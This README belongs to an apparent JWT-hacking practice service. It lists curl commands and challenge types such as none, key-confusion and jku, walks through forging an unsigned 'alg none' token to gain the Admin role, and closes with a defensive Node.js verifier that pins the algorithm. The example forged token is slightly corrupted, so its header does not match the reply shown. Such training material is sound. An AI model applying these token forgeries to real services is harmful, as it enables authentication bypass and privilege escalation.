# JWT Hacking

In each of these challenges, an attacker can alter a JWT. To complete a challenge, you must forge a JWT and send it back to the API. If you are successful, the API will display a success message.

### NOTE:

Sending back an unaltered JWT will show it as valid, but you have not hacked anything. To get credit, you must change your role from `User` to `Admin` in the token. When the API prints a success message, it will show your role. Your role in the success message must show `Admin` (or at the very least any value which is not `User`) to get credit.

## Basic Usage

The API can be interacted with simply using curl.

* Basic request

```
curl https://jwt.ethicalhacking.academy/
```

* Help document

```
curl https://jwt.ethicalhacking.academy/helpme
```

- All POST bodies must be JSON formatted.
- All POST requests must set the `content-type` request header: `application/json`
- For initiating a JWT challenge, POST the following JSON struct to path `/jwt`, where `${CHALLENGE_ID}` is the Id of the challenge (more below)

## Attempting/Solving Challenges

Challenges are initiated by calling the `/jwt` path with a payload `{"attack": "${CHALLENGE_ID}"}` specifying the attack you wish to attempt.

Challenges are solved by calling the `/jwt/{CHALLENGE_ID}` path with a payload `{"jwt_token": "${JWT}"}`.

* Initiating a challenge

```
curl -X POST -H "content-type: application/json" -d '{"attack": "${CHALLENGE_ID}"}' https://jwt.ethicalhacking.academy/jwt
```

* Solving a challenge

```
curl -X POST -H "content-type: application/json" -d '{"jwt_token": "${JWT}"}' https://jwt.ethicalhacking.academy/jwt/${CHALLENGE_ID}
```

## Supported CHALLENGE_ID Values

Supported values for `${CHALLENGE_ID}`

- none
- weak-secret
- key-confusion
- key-injection
- jku
- x5u
- kid00

## Examples

Starting a challenge of type `none` and attempting to solve it

* Request to start `none` challenge

```
curl -X POST -H "content-type: application/json" -d '{"attack": "none"}' https://jwt.ethicalhacking.academy/jwt
```

* Response to request to start `none` challenge

```
{
  "jwt": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaXJzdG5hbWUiOiJIYXJyaWVyIiwibGFzdG5hbWUiOiJEdSBCb2lzIiwiYWNjb3VudCI6IkhhcnJ5RHVCb2lzIiwicm9sZSI6IlVzZXIiLCJpYXQiOjE2OTg4ODIxODUsImF1ZCI6Imh0dHBzOi8vand0LmV0aGljYWxoYWNraW5nLmFjYWRlbXkvand0L25vbmUifQ.hwKmfHOW9TKOXe0XqYKfliFo4unTYD8uTQ679LVN8cM",
  "endpoint": "https://jwt.ethicalhacking.academy/jwt/none"
}
```

* Example unsuccessful attempt to solve `none` challenge

```
curl -X POST -H "content-type: application/json" -d '{"jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmaXJzdG5hbWUiOiJoZWxsbyIsImxhc3RuYW1lIjoiRHUgQm9pcyIsImFjY291bnQiOiJIYXJyeUR1Qm9pcyIsInJvbGUiOiJVc2VyIiwiaWF0IjoxNjk4ODgyMTg1LCJhdWQiOiJodHRwczovL2p3dC5ldGhpY2FsaGFja2luZy5hY2FkZW15L2p3dC9ub25lIn0.5oVTyBWOOUR8jAfOL-l1Rc3maoEcKQPUrPckilxD7wM"}' https://jwt.ethicalhacking.academy/jwt/none

{
  "name": "JsonWebTokenError",
  "message": "invalid signature"
}
```

* Example successful attempt to solve `none` challenge

```
curl -X POST -H "content-type: application/json" -d '{"jwt_token": "eyJhbCCiOiJub25lIiwiAAlwLLoiSldUIn0.eyJmaXJzdG5hbWUiOiJIYXJZZWVyIiwibGFzdG5hbWUiOiJEdSBCb2lzIiwiYWNjb3VudCI6IkhhcnJ5RHVCb2lzIiwicm9sZSI6IkFkbWluIiwiaWF0IjoxNjk4ODgyNTI5LCJhdWQiOiJodHRwczovL2p3dC5ldGhpY2FsaGFja2luZy5hY2FkZW15L2p3dC9ub25lIn0."}' https://jwt.ethicalhacking.academy/jwt/none

{
  "message": "Wed, 01 Nov 2023 23:31:35 GMTCongrats!! You've solved the JWT challenge!!",
  "jwt_token": {
    "header": {
      "alg": "none",
      "typ": "JWT"
    },
    "payload": {
      "firstname": "Harrier",
      "lastname": "Du Bois",
      "account": "HarryDuBois",
      "role": "Admin",
      "iat": 1698882529,
      "aud": "https://jwt.ethicalhacking.academy/jwt/none"
    },
    "signature": ""
  }
}
```
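
The defensive counterpart to the `none` example above, as an added example that is not part of the original README or the challenge API's code: an HS256 verifier that fixes the expected algorithm itself instead of honouring the token's `alg` header, so an unsigned token is refused before any signature logic runs. The secret, claims and sample tokens are constructed for illustration, and Node.js with its built-in `crypto` module is assumed.

```javascript
// Added example (not the challenge API's code): an HS256 verifier that pins the algorithm.
const crypto = require('node:crypto');

const enc = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const dec = (seg) => JSON.parse(Buffer.from(seg, 'base64url').toString('utf8'));
const mac = (data, secret) => crypto.createHmac('sha256', secret).update(data).digest();

function verifyHS256(token, secret) {
  const parts = String(token).split('.');
  if (parts.length !== 3) return { ok: false, reason: 'malformed' };
  const [head, body, sig] = parts;
  let header, payload;
  try {
    header = dec(head);
    payload = dec(body);
  } catch {
    return { ok: false, reason: 'malformed' };
  }
  // The expected algorithm is fixed by the verifier; the header's "alg" is only
  // compared against it, never used to select how (or whether) to verify.
  if (header?.alg !== 'HS256') return { ok: false, reason: 'alg not allowed' };
  const expected = mac(`${head}.${body}`, secret);
  const given = Buffer.from(sig, 'base64url');
  // timingSafeEqual throws on unequal lengths, so check the length first.
  if (given.length !== expected.length || !crypto.timingSafeEqual(given, expected)) {
    return { ok: false, reason: 'invalid signature' };
  }
  return { ok: true, payload };
}

// Constructed sample data (secret, claims and tokens are made up for this example).
const SAMPLE_SECRET = 'constructed-demo-secret';
const claims = { account: 'demo', role: 'User' };
const hdr = enc({ alg: 'HS256', typ: 'JWT' });
const signedInput = `${hdr}.${enc(claims)}`;
const SAMPLE_SIGNED = `${signedInput}.${mac(signedInput, SAMPLE_SECRET).toString('base64url')}`;
// Same signature, edited payload: the case the "invalid signature" reply above rejects.
const SAMPLE_TAMPERED = [hdr, enc({ ...claims, role: 'Admin' }), SAMPLE_SIGNED.split('.')[2]].join('.');
// Header declares "none" and the signature segment is empty, as in the successful attempt above.
const SAMPLE_UNSIGNED = `${enc({ alg: 'none', typ: 'JWT' })}.${enc({ ...claims, role: 'Admin' })}.`;

for (const [name, tok] of Object.entries({ SAMPLE_SIGNED, SAMPLE_TAMPERED, SAMPLE_UNSIGNED })) {
  console.log(name, JSON.stringify(verifyHS256(tok, SAMPLE_SECRET)));
}
```

With the `jsonwebtoken` package, the equivalent control is passing an explicit `algorithms` allow-list to `jwt.verify`.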